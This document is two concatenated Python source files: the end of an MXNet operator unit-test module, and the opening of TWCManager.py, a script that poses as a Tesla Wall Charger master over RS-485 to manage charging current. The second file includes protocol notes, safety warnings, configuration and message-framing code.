                           rtol=1e-5, atol=1e-5)
    # check backward
    check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
                            expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
    # check backward using finite difference
    check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
    # Part 3 - Test 3D input with scalar mean/std
    shape_3d = (3, 28, 28)
    mean = 1.0
    std = 2.0
    data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
    data_expected_3d = data_in_3d.asnumpy()
    data_expected_3d[:] = (data_expected_3d - 1.0) / 2.0
    data = mx.symbol.Variable('data')
    img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
    # check forward
    check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
                           rtol=1e-5, atol=1e-5)
    # Gradient is 1/std_dev
    grad_expected_3d = np.full(shape_3d, 1 / 2.0)
    # check backward
    check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
                            expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
    # check backward using finite difference
    check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
    # Part 4 - Test 4D input with scalar mean/std
    shape_4d = (2, 3, 28, 28)
    data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
    data_expected_4d = data_in_4d.asnumpy()
    data_expected_4d[:] = (data_expected_4d - 1.0) / 2.0
    # check forward
    check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
                           rtol=1e-5, atol=1e-5)
    # Gradient is 1/std_dev
    grad_expected_4d = np.full(shape_4d, 1 / 2.0)
    # check backward
    check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
                            expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
    # check backward using finite difference
    check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
def test_index_array():
    """Check mx.sym.contrib.index_array: forward output equals the stacked
    meshgrid of indices, backward gradient is all zeros (indices are data-
    independent). Zero-dim/zero-size cases require np_shape semantics."""
    def test_index_array_default():
        for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
            data = mx.symbol.Variable("data")
            index_array = mx.sym.contrib.index_array(data)
            input_array = np.ones(shape)
            # Expected output: at position p, the index vector p itself.
            mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
            expected = np.stack(mgrid, axis=-1)
            check_symbolic_forward(index_array, [input_array], [expected])
            check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
    @mx.use_np_shape
    def test_index_array_default_zero_dim():
        # 0-d input yields an empty index vector.
        data = mx.symbol.Variable("data")
        index_array = mx.sym.contrib.index_array(data)
        input_array = np.ones(())
        expected = np.zeros((0,))
        check_symbolic_forward(index_array, [input_array], [expected])
        check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
    @mx.use_np_shape
    def test_index_array_default_zero_size():
        # Zero-size input yields a zero-size output with a trailing ndim axis.
        data = mx.symbol.Variable("data")
        index_array = mx.sym.contrib.index_array(data)
        input_array = np.ones((0, 0, 0))
        expected = np.zeros((0, 0, 0, 3))
        check_symbolic_forward(index_array, [input_array], [expected])
        check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
    def test_index_array_select_axes():
        # axes= selects (and orders) which index components are emitted,
        # including negative axis values.
        shape = (5, 7, 11, 13, 17, 19)
        for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
            data = mx.symbol.Variable("data")
            index_array = mx.sym.contrib.index_array(data, axes=axes)
            input_array = np.ones(shape)
            mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
            expected = np.stack(mgrid, axis=-1)[..., axes]
            check_symbolic_forward(index_array, [input_array], [expected])
            check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
    @mx.use_np_shape
    def test_index_array_select_axes_zero_size():
        data = mx.symbol.Variable("data")
        index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
        input_array = np.ones((0, 0, 0, 0))
        expected = np.zeros((0, 0, 2))
        check_symbolic_forward(index_array, [input_array], [expected])
        check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
    test_index_array_default()
    test_index_array_default_zero_dim()
    test_index_array_default_zero_size()
    test_index_array_select_axes()
    test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
    """0-d tensors are rejected by default and allowed under np_shape."""
    # Legacy shape semantics: shape=() is invalid.
    assertRaises(MXNetError, mx.nd.zeros, shape=())
    assertRaises(MXNetError, mx.nd.ones, shape=())
    with mx.np_shape():
        scalar_mx = mx.nd.ones(shape=())
        scalar_np = np.ones((), dtype=scalar_mx.dtype)
        assert same(scalar_mx.asnumpy(), scalar_np)
@with_seed()
def test_zero_size_tensor_creation():
    """Zero-size tensors are rejected by default and allowed under np_shape."""
    # Legacy shape semantics: any zero dimension is invalid.
    assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
    assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
    with mx.np_shape():
        zero_mx = mx.nd.ones(shape=(0, 1, 0, 4))
        zero_np = np.ones(shape=zero_mx.shape, dtype=zero_mx.dtype)
        assert same(zero_mx.asnumpy(), zero_np)
@with_seed()
def test_concat_with_zero_size_tensor():
    """Concat must handle zero-size inputs under np_shape semantics."""
    with mx.np_shape():
        # Zero-size pieces along the concat axis contribute nothing.
        ret = mx.nd.Concat(mx.nd.ones((0, 8, 12)),
                           mx.nd.ones((3, 8, 12)),
                           mx.nd.ones((0, 8, 12)), dim=0)
        assert ret.shape == (3, 8, 12)
        # All inputs have a zero leading dim; concat axis sizes still add up.
        ret = mx.nd.Concat(mx.nd.ones((0, 3, 10)),
                           mx.nd.ones((0, 4, 10)),
                           mx.nd.ones((0, 5, 10)), dim=1)
        assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
    """Check that @mx.use_np_shape preserves function metadata and enables
    numpy-style (scalar / zero-size) shapes inside the decorated function."""
    @mx.use_np_shape
    def check_scalar_one():
        """Generate scalar one tensor"""
        return mx.nd.ones(shape=())
    # functools.wraps-style metadata must survive the decorator.
    assert check_scalar_one.__name__ == "check_scalar_one"
    assert check_scalar_one.__doc__ == "Generate scalar one tensor"
    assert check_scalar_one().shape == ()
    # The decorator must win regardless of the surrounding np_shape state.
    for active in [True, False]:
        with mx.np_shape(active=active):
            assert check_scalar_one.__name__ == "check_scalar_one"
            assert check_scalar_one.__doc__ == "Generate scalar one tensor"
            assert check_scalar_one().shape == ()
    @mx.use_np_shape
    def check_concat(shape1, shape2, axis):
        # Concat of (possibly zero-size) inputs must match numpy.concatenate.
        data1 = mx.nd.ones(shape1)
        data2 = mx.nd.ones(shape2)
        ret = mx.nd.Concat(data1, data2, dim=axis)
        expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
        assert ret.shape == expected_ret.shape
    check_concat((0, 3, 4), (5, 3, 4), 0)
    check_concat((8, 0, 5), (8, 7, 5), 1)
    check_concat((8, 0, 0), (8, 0, 0), 2)
    # NOTE(review): `active` is unused below — the calls are not wrapped in
    # `with mx.np_shape(active=active):`. Presumably the intent was to verify
    # the decorator overrides the outer context; confirm and either add the
    # `with` block or drop the loop.
    for active in [True, False]:
        check_concat((0, 3, 4), (5, 3, 4), 0)
        check_concat((8, 0, 5), (8, 7, 5), 1)
        check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
    """add_n must equal the elementwise sum, even when out aliases an input."""
    data_shape = (2, 2)
    input_num = 5
    inputs = [mx.nd.random.uniform(shape=data_shape) for _ in range(input_num)]
    expected = mx.nd.zeros(shape=data_shape)
    for arr in inputs:
        expected += arr
    # out=inputs[0] deliberately aliases the first input.
    add_n_rslt = mx.nd.add_n(*inputs, out=inputs[0])
    assert_almost_equal(expected.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
    """The operator registry is a non-empty list that includes Activation."""
    registered = get_all_registered_operators()
    ok_(isinstance(registered, list))
    ok_(len(registered) > 0)
    ok_('Activation' in registered)
def test_get_operator_arguments():
    """get_operator_arguments('Activation') exposes names, types and arity."""
    args_info = get_operator_arguments('Activation')
    ok_(isinstance(args_info, OperatorArguments))
    ok_(args_info.names == ['data', 'act_type'])
    expected_types = ['NDArray-or-Symbol',
                      "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
    ok_(args_info.types == expected_types)
    ok_(args_info.narg == 2)
if __name__ == '__main__':
    # Run all tests in this module through nose when executed directly.
    import nose
    nose.runmodule()
|
TWCManager.py | #! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/cdragon/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# WARNING:
# Misuse of the protocol described in this software can direct a Tesla Wall
# Charger to supply more current to a car than the charger wiring was designed
# for. This will trip a circuit breaker or may start a fire in the unlikely
# event that the circuit breaker fails.
# This software was not written or designed with the benefit of information from
# Tesla and there is always a small possibility that some unforeseen aspect of
# its operation could damage a Tesla vehicle or a Tesla Wall Charger. All
# efforts have been made to avoid such damage and this software is in active use
# on the author's own vehicle and TWC.
#
# In short, USE THIS SOFTWARE AT YOUR OWN RISK.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
################################################################################
# What's TWCManager good for?
#
# This script (TWCManager) pretends to be a Tesla Wall Charger (TWC) set to
# master mode. When wired to the IN or OUT pins of real TWC units set to slave
# mode (rotary switch position F), TWCManager can tell them to limit car
# charging to any whole amp value between 5A and the max rating of the charger.
# Charging can also be stopped so the car goes to sleep.
#
# This level of control is useful for having TWCManager track the real-time
# availability of green energy sources and direct the slave TWCs to use near the
# exact amount of energy available. This saves energy compared to sending the
# green energy off to a battery for later car charging or off to the grid where
# some of it is lost in transmission.
#
# TWCManager can also be set up to only allow charging during certain hours,
# stop charging if a grid overload or "save power day" is detected, reduce
# charging on one TWC when a "more important" one is plugged in, or whatever
# else you might want to do.
#
# One thing TWCManager does not have direct access to is the battery charge
# percentage of each plugged-in car. There are hints on forums that some TWCs
# do report battery state, but we have yet to see a TWC send such a message.
# It's possible the feature exists in TWCs with newer firmware.
# This is unfortunate, but if you own a Tesla vehicle being charged, people have
# figured out how to get its charge state by contacting Tesla's servers using
# the same password you use in the Tesla phone app. Be very careful not to
# expose that password because it allows unlocking and starting the car.
################################################################################
# Overview of protocol TWCs use to load share
#
# A TWC set to slave mode (rotary switch position F) sends a linkready message
# every 10 seconds.
# The message contains a unique 4-byte id that identifies that particular slave
# as the sender of the message.
#
# A TWC set to master mode sees a linkready message. In response, it sends a
# heartbeat message containing the slave's 4-byte id as the intended recipient
# of the message.
# The master's 4-byte id is included as the sender of the message.
#
# Slave sees a heartbeat message from master directed to its unique 4-byte id
# and responds with its own heartbeat message containing the master's 4-byte id
# as the intended recipient of the message.
# The slave's 4-byte id is included as the sender of the message.
#
# Master sends a heartbeat to a slave around once per second and expects a
# response heartbeat from the slave.
# Slaves do not send heartbeats without seeing one from a master first. If
# heartbeats stop coming from master, slave resumes sending linkready every 10
# seconds.
# If slaves stop replying to heartbeats from master, master stops sending
# heartbeats after about 26 seconds.
#
# Heartbeat messages contain a data block used to negotiate the amount of power
# available to each slave and to the master.
# The first byte is a status indicating things like is TWC plugged in, does it
# want power, is there an error, etc.
# Next two bytes indicate the amount of power requested or the amount allowed in
# 0.01 amp increments.
# Next two bytes indicate the amount of power being used to charge the car, also in
# 0.01 amp increments.
# Remaining bytes always contain a value of 0.
import serial
import time
import re
import subprocess
import queue
import random
import math
import struct
import sys
import traceback
import sysv_ipc
import json
from datetime import datetime
import threading
##########################
#
# Configuration parameters
#
# Most users will have only one ttyUSB adapter plugged in and the default value
# of '/dev/ttyUSB0' below will work. If not, run 'dmesg |grep ttyUSB' on the
# command line to find your rs485 adapter and put its ttyUSB# value in the
# parameter below.
# If you're using a non-USB adapter like an RS485 shield, the value may need to
# be something like '/dev/serial0'.
rs485Adapter: str = '/dev/ttyUSB0'
# Set wiringMaxAmpsAllTWCs to the maximum number of amps your charger wiring
# can handle.
# NOTE(review): the original comment here claimed a "low 6A" default, but the
# value below is 40 - confirm it matches your actual wiring before use.
# Most U.S. chargers will be wired to handle at least 40A and sometimes 80A,
# whereas EU chargers will handle at most 32A (using 3 AC lines instead of 2 so
# the total power they deliver is similar).
# Setting wiringMaxAmpsAllTWCs too high will trip the circuit breaker on your
# charger at best or START A FIRE if the circuit breaker malfunctions.
# Keep in mind that circuit breakers are designed to handle only 80% of their
# max power rating continuously, so if your charger has a 50A circuit breaker,
# put 50 * 0.8 = 40 here.
# 40 amp breaker * 0.8 = 32 here.
# 30 amp breaker * 0.8 = 24 here.
# 100 amp breaker * 0.8 = 80 here.
# IF YOU'RE NOT SURE WHAT TO PUT HERE, ASK THE ELECTRICIAN WHO INSTALLED YOUR
# CHARGER.
wiringMaxAmpsAllTWCs: int = 40  # amps, shared across all TWCs
# If all your chargers share a single circuit breaker, set wiringMaxAmpsPerTWC
# to the same value as wiringMaxAmpsAllTWCs.
# Rarely, each TWC will be wired to its own circuit breaker. If you're
# absolutely sure your chargers each have a separate breaker, put the value of
# that breaker * 0.8 here, and put the sum of all breakers * 0.8 as the value of
# wiringMaxAmpsAllTWCs.
# For example, if you have two TWCs each with a 50A breaker, set
# wiringMaxAmpsPerTWC = 50 * 0.8 = 40 and wiringMaxAmpsAllTWCs = 40 + 40 = 80.
wiringMaxAmpsPerTWC: int = 40  # amps, per individual TWC
# https://teslamotorsclub.com/tmc/threads/model-s-gen2-charger-efficiency-testing.78740/#post-1844789
# says you're using 10.85% more power (91.75/82.77=1.1085) charging at 5A vs 40A,
# 2.48% more power at 10A vs 40A, and 1.9% more power at 20A vs 40A. This is
# using a car with 2nd generation onboard AC/DC converter (VINs ending in 20000
# and higher).
# https://teslamotorsclub.com/tmc/threads/higher-amp-charging-is-more-efficient.24972/
# says that cars using a 1st generation charger may use up to 30% more power
# at 6A vs 40A! However, the data refers to 120V 12A charging vs 240V 40A
# charging. 120V 12A is technically the same power as 240V 6A, but the car
# batteries need 400V DC to charge and a lot more power is wasted converting
# 120V AC to 400V DC than 240V AC to 400V DC.
#
# The main point is 6A charging wastes a lot of power, so we default to charging
# at a minimum of 12A by setting minAmpsPerTWC to 12. I picked 12A instead of 10A
# because there is a theory that multiples of 3A are most efficient, though I
# couldn't find any data showing that had been tested.
#
# Most EU chargers are connected to 230V, single-phase power which means 12A is
# about the same power as in US chargers. If you have three-phase power, you can
# lower minAmpsPerTWC to 6 and still be charging with more power than 12A on
# single-phase. For example, 12A * 230V * 1 = 2760W for single-phase power, while
# 6A * 230V * 3 = 4140W for three-phase power. Consult an electrician if this
# doesn't make sense.
#
# https://forums.tesla.com/forum/forums/charging-lowest-amperage-purposely
# says another reason to charge at higher power is to preserve battery life.
# The best charge rate is the capacity of the battery pack / 2. Home chargers
# can't reach that rate, so charging as fast as your wiring supports is best
# from that standpoint. It's not clear how much damage charging at slower
# rates really does.
minAmpsPerTWC: int = 12  # amps; floor for any single TWC's charge rate
# When you have more than one vehicle associated with the Tesla car API and
# onlyChargeMultiCarsAtHome = True, cars will only be controlled by the API when
# parked at home. For example, when one vehicle is plugged in at home and
# another is plugged in at a remote location and you've set TWCManager to stop
# charging at the current time, only the one plugged in at home will be stopped
# from charging using the car API.
# Unfortunately, bugs in the car GPS system may cause a car to not be reported
# as at home even if it is, in which case the car might not be charged when you
# expect it to be. If you encounter that problem with multiple vehicles, you can
# set onlyChargeMultiCarsAtHome = False, but you may encounter the problem of
# a car not at home being stopped from charging by the API.
onlyChargeMultiCarsAtHome: bool = True
# After determining how much green energy is available for charging, we add
# greenEnergyAmpsOffset to the value. This is most often given a negative value
# equal to the average amount of power consumed by everything other than car
# charging. For example, if your house uses an average of 2.8A to power
# computers, lights, etc while you expect the car to be charging, set
# greenEnergyAmpsOffset = -2.8.
#
# If you have solar panels, look at your utility meter while your car charges.
# If it says you're using 0.67kW, that means you should set
# greenEnergyAmpsOffset = -0.67kW * 1000 / 240V = -2.79A assuming you're on the
# North American 240V grid. In other words, during car charging, you want your
# utility meter to show a value close to 0kW meaning no energy is being sent to
# or from the grid.
greenEnergyAmpsOffset = 0  # amps; may be fractional and/or negative (see above)
# Choose how much debugging info to output.
# 0 is no output other than errors.
# 1 is just the most useful info.
# 2-8 add debugging info
# 9 includes raw RS-485 messages transmitted and received (2-3 per sec)
# 10 is all info.
# 11 is more than all info. ;)
debugLevel: int = 1
# Choose whether to display milliseconds after time on each line of debug info.
displayMilliseconds: bool = False
# Normally we fake being a TWC Master using fakeMaster = 1.
# Two other settings are available, but are only useful for debugging and
# experimenting:
#   Set fakeMaster = 0 to fake being a TWC Slave instead of Master.
#   Set fakeMaster = 2 to display received RS-485 messages but not send any
#                      unless you use the debugging web interface
#                      (index.php?debugTWC=1) to send messages.
fakeMaster: int = 1
# TWC's rs485 port runs at 9600 baud which has been verified with an
# oscilloscope. Don't change this unless something changes in future hardware.
baud: int = 9600
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 65535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID: bytearray = bytearray(b'\x77\x77')
# TWCs send a seemingly-random byte after their 2-byte TWC id in a number of
# messages. I call this byte their "Sign" for lack of a better term. The byte
# never changes unless the TWC is reset or power cycled. We use hard-coded
# values for now because I don't know if there are any rules to what values can
# be chosen. I picked 77 because it's easy to recognize when looking at logs.
# These shouldn't need to be changed.
masterSign: bytearray = bytearray(b'\x77')
slaveSign: bytearray = bytearray(b'\x77')
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def time_now():
    """Return the current wall-clock time as HH:MM:SS, appending .microseconds
    when displayMilliseconds is enabled."""
    stamp_format = "%H:%M:%S"
    if(displayMilliseconds):
        stamp_format += ".%f"
    return datetime.now().strftime(stamp_format)
def hex_str(data):
    """Return *data* as space-separated, two-digit uppercase hex values.

    Accepts either a str (each character's ordinal is shown) or a
    bytes/bytearray (each byte value is shown).

    The original file defined hex_str twice - once for str and once for
    bytearray - but Python has no overloading, so the second definition
    silently shadowed the first, making the str variant dead code. This
    single implementation handles both input types.
    """
    if isinstance(data, str):
        return " ".join("{:02X}".format(ord(c)) for c in data)
    return " ".join("{:02X}".format(b) for b in data)
def run_process(cmd):
    """Run a shell command string and return its stdout as bytes.

    A non-zero exit status is not an error from the caller's point of view;
    it simply yields empty bytes.
    """
    try:
        return subprocess.check_output(cmd, shell=True)
    except subprocess.CalledProcessError:
        # Command exited non-zero; treat its output as empty.
        return b''
def load_settings():
    """Load persisted settings from settingsFileName into module globals.

    Each line of the settings file is 'name=value'. Lines that match no
    known setting are reported. A missing file is not an error; whatever
    defaults are already set simply remain in effect.

    Fix over the original: the file handle is now managed by 'with', so it
    is closed even when a value fails to convert mid-parse (the original
    called fh.close() only on the success path).
    """
    # (name, value-pattern, converter) for every persisted setting.
    # Numeric settings restrict the value to number-like characters so a
    # corrupt line can't inject arbitrary text; free-form settings (API
    # tokens, coordinates) accept anything after '='. Patterns and
    # converters match the original per-setting regexes exactly.
    settingSpecs = (
        ('nonScheduledAmpsMax', r'([-0-9.]+)', int),
        ('scheduledAmpsMax', r'([-0-9.]+)', int),
        ('scheduledAmpsStartHour', r'([-0-9.]+)', float),
        ('scheduledAmpsEndHour', r'([-0-9.]+)', float),
        ('scheduledAmpsDaysBitmap', r'([-0-9.]+)', int),
        ('hourResumeTrackGreenEnergy', r'([-0-9.]+)', float),
        ('kWhDelivered', r'([-0-9.]+)', float),
        ('carApiBearerToken', r'(.+)', str),
        ('carApiRefreshToken', r'(.+)', str),
        ('carApiTokenExpireTime', r'(.+)', float),
        ('homeLat', r'(.+)', float),
        ('homeLon', r'(.+)', float),
    )
    try:
        with open(settingsFileName, 'r') as fh:
            for line in fh:
                for name, valuePattern, convert in settingSpecs:
                    m = re.search(r'^\s*' + name + r'\s*=\s*' + valuePattern,
                                  line, re.MULTILINE)
                    if(m):
                        # Assign into module globals, as the original's
                        # 'global' declarations plus direct assignment did.
                        globals()[name] = convert(m.group(1))
                        if(debugLevel >= 10):
                            print("load_settings: " + name + " set to "
                                  + str(globals()[name]))
                        break
                else:
                    # No spec matched this line.
                    print(time_now() + ": load_settings: Unknown setting " + line)
    except FileNotFoundError:
        pass
def save_settings():
    """Persist all user-adjustable settings to settingsFileName.

    Writes one 'name=value' pair per line, newline-separated with no
    trailing newline, in a fixed order.
    """
    global debugLevel, settingsFileName, nonScheduledAmpsMax, scheduledAmpsMax, \
           scheduledAmpsStartHour, scheduledAmpsEndHour, \
           scheduledAmpsDaysBitmap, hourResumeTrackGreenEnergy, kWhDelivered, \
           carApiBearerToken, carApiRefreshToken, carApiTokenExpireTime, \
           homeLat, homeLon
    pairs = [
        ('nonScheduledAmpsMax', nonScheduledAmpsMax),
        ('scheduledAmpsMax', scheduledAmpsMax),
        ('scheduledAmpsStartHour', scheduledAmpsStartHour),
        ('scheduledAmpsEndHour', scheduledAmpsEndHour),
        ('scheduledAmpsDaysBitmap', scheduledAmpsDaysBitmap),
        ('hourResumeTrackGreenEnergy', hourResumeTrackGreenEnergy),
        ('kWhDelivered', kWhDelivered),
        ('carApiBearerToken', carApiBearerToken),
        ('carApiRefreshToken', carApiRefreshToken),
        # Token expiry is stored as a whole number of seconds.
        ('carApiTokenExpireTime', int(carApiTokenExpireTime)),
        ('homeLat', homeLat),
        ('homeLon', homeLon),
    ]
    with open(settingsFileName, 'w') as fh:
        fh.write('\n'.join(name + '=' + str(value) for name, value in pairs))
def trim_pad(s:bytearray, makeLen):
    """Return s adjusted to exactly makeLen bytes.

    Padding with zero bytes happens in place (mutating the caller's
    bytearray, as the original's += loop did); trimming returns a new,
    shortened copy.
    """
    shortfall = makeLen - len(s)
    if shortfall > 0:
        # bytearray(n) is n zero bytes; extend mutates s in place.
        s.extend(bytearray(shortfall))
    elif shortfall < 0:
        s = s[0:makeLen]
    return s
def send_msg(msg):
    """Frame and transmit msg on the RS485 network.

    Appends a checksum byte (sum of every byte after the first, mod 256,
    per the TWC protocol), SLIP-escapes the result, and wraps it in C0
    start/end markers before writing it to the serial port.

    Escaping (per the SLIP protocol,
    https://en.wikipedia.org/wiki/Serial_Line_Internet_Protocol, as user
    FuzzyLogic identified): a C0 byte inside the payload becomes DB DC and
    a DB byte becomes DB DD, so a raw C0 on the wire can only ever mean
    start or end of a frame.
    """
    global ser, timeLastTx, fakeMaster, slaveTWCRoundRobin

    msg = bytearray(msg)
    # Checksum deliberately skips byte 0.
    msg.append(sum(msg[1:]) & 0xFF)

    escaped = bytearray()
    for byte in msg:
        if(byte == 0xc0):
            escaped += b'\xdb\xdc'
        elif(byte == 0xdb):
            escaped += b'\xdb\xdd'
        else:
            escaped.append(byte)

    frame = bytearray(b'\xc0') + escaped + bytearray(b'\xc0')
    if(debugLevel >= 9):
        print("Tx@" + time_now() + ": " + hex_str(frame))
    ser.write(frame)
    timeLastTx = time.time()
def unescape_msg(msg:bytearray, msgLen):
    """Strip framing from a received RS485 message and un-escape it.

    Truncates msg to msgLen, reverses the SLIP-style escaping applied by
    send_msg() (DB DC -> C0, DB DD -> DB), then removes the leading and
    trailing C0 frame markers.

    NOTE(review): despite the original comment, the CRC byte is NOT
    verified here; callers must check it themselves.
    """
    msg = msg[0:msgLen]

    # See notes in send_msg() for the way certain bytes in messages are escaped.
    # We basically want to change db dc into c0 and db dd into db.
    # Scan only to one less than the length so looking at msg[i+1] can never
    # run off the end. (Fix: the original condition was "i < len(msg)",
    # contradicting its own comment and raising IndexError on a corrupt
    # message ending in a lone 0xDB byte.)
    i = 0
    while i < len(msg) - 1:
        if(msg[i] == 0xdb):
            if(msg[i+1] == 0xdc):
                # Collapse the two escape bytes into the single 0xc0 they
                # represent, shortening the message by one byte.
                msg[i:i+2] = [0xc0]
            elif(msg[i+1] == 0xdd):
                msg[i:i+2] = [0xdb]
            else:
                print(time_now(), "ERROR: Special character 0xDB in message is " \
                      "followed by invalid character 0x%02X. " \
                      "Message may be corrupted." %
                      (msg[i+1]))
                # Replace the character with something even though it's probably
                # not the right thing.
                msg[i:i+2] = [0xdb]
        i = i+1

    # Remove leading and trailing C0 byte.
    msg = msg[1:len(msg)-1]
    return msg
def send_master_linkready1():
    """Broadcast the master linkready1 (FC E1) announcement.

    On power-up/reset a master sends 5-7 copies of linkready1 followed by 5
    copies of linkready2. linkready1 advertises the master's TWCID; a slave
    with the same id picks a new random one, but slaves otherwise do not
    respond to it. The two messages are identical except linkready1 carries
    FC E1 where linkready2 carries FB E2.

    Observed behavior: linkready1 is not re-sent after boot unless a slave's
    own linkready appears (e.g. after a slave stops responding and then
    re-appears), at which point it may repeat every 1-5 seconds - or never.
    A second master transmitting these messages triggers an error state
    (red LED flashing 4 times, top green light on) on both masters.

    Tests show neither linkready1 nor linkready2 is strictly necessary:
    slaves send their own linkready every 10 seconds regardless, and a
    master that hears one starts the per-second heartbeat that links them.
    (linkready1's FC E1 also resembles the mysterious all-zero FC D1
    message masters emit every 4 hours when idle.)
    """
    if(debugLevel >= 1):
        print(time_now() + ": Send master linkready1")
    payload = bytearray(b'\xFC\xE1') + fakeTWCID + masterSign \
              + bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00')
    send_msg(payload)
def send_master_linkready2():
    """Broadcast the master linkready2 (FB E2) announcement.

    Sent 5 times when the master boots/resets, then only at long intervals
    once a slave has ever been heard. Slaves ignore the first linkready2 but
    answer the second (~0.2s later) with five slave linkready messages.

    linkready2 (FB E2) may really be the same message type as the master
    heartbeat (FB E0), except the E0 form names a recipient slave TWCID
    while E2 has none. Once a master is heartbeating a slave, it stops (or
    nearly stops) sending this global linkready2.
    """
    if(debugLevel >= 1):
        print(time_now() + ": Send master linkready2")
    payload = bytearray(b'\xFB\xE2') + fakeTWCID + masterSign \
              + bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00')
    send_msg(payload)
def send_slave_linkready():
    """Broadcast the slave linkready (FD E2) announcement for our fake slave.

    The bytes 0x1F 0x40 (8000 decimal) advertise a max 80.00A charger model;
    EU chargers are 32A and send 0x0C 0x80 (3200). Advertising a max-amps
    value different from the real master's makes it blink its red LED 6
    times with the top green LED on ("The networked Wall Connectors have
    different maximum current capabilities" per the manual).
    """
    msg = bytearray(b'\xFD\xE2') + fakeTWCID + slaveSign \
          + bytearray(b'\x1F\x40\x00\x00\x00\x00\x00\x00')
    # Fix: the original read self.protocolVersion, but this is a module-level
    # function with no self, so that line always raised NameError. It should
    # read the module-level protocolVersion setting used elsewhere in this
    # file. Protocol 2 frames carry two extra trailing zero bytes.
    if(protocolVersion == 2):
        msg += bytearray(b'\x00\x00')
    send_msg(msg)
def master_id_conflict():
    """Handle a master using our fake slave's TWCID.

    By convention the slave is the one that must yield in an ID conflict
    (masters never change their TWCID), so pick a fresh random TWCID and -
    like real slaves do - a fresh sign byte, then log the new identity.
    """
    for idx in range(len(fakeTWCID)):
        fakeTWCID[idx] = random.randint(0, 0xFF)
    slaveSign[0] = random.randint(0, 0xFF)

    print(time_now() + ": Master's TWCID matches our fake slave's TWCID. " \
          "Picked new random TWCID %02X%02X with sign %02X" % \
          (fakeTWCID[0], fakeTWCID[1], slaveSign[0]))
def new_slave(newSlaveID, maxAmps):
    """Return the TWCSlave tracked under newSlaveID, creating it if needed.

    At most 3 slaves are tracked; registering a fourth evicts the one seen
    longest ago.
    """
    global slaveTWCs, slaveTWCRoundRobin

    existing = slaveTWCs.get(newSlaveID)
    if(existing is not None):
        # Already known; just hand it back.
        return existing

    slaveTWC = TWCSlave(newSlaveID, maxAmps)
    slaveTWCs[newSlaveID] = slaveTWC
    slaveTWCRoundRobin.append(slaveTWC)

    if(len(slaveTWCRoundRobin) > 3):
        print("WARNING: More than 3 slave TWCs seen on network. " \
              "Dropping oldest: " + hex_str(slaveTWCRoundRobin[0].TWCID) + ".")
        delete_slave(slaveTWCRoundRobin[0].TWCID)

    return slaveTWC
def delete_slave(deleteSlaveID):
    """Forget the slave TWC with the given ID.

    Removes it from both the round-robin list and the id->slave dict;
    an unknown ID is silently ignored.
    """
    global slaveTWCs, slaveTWCRoundRobin
    for idx, slaveTWC in enumerate(slaveTWCRoundRobin):
        if(slaveTWC.TWCID == deleteSlaveID):
            del slaveTWCRoundRobin[idx]
            break
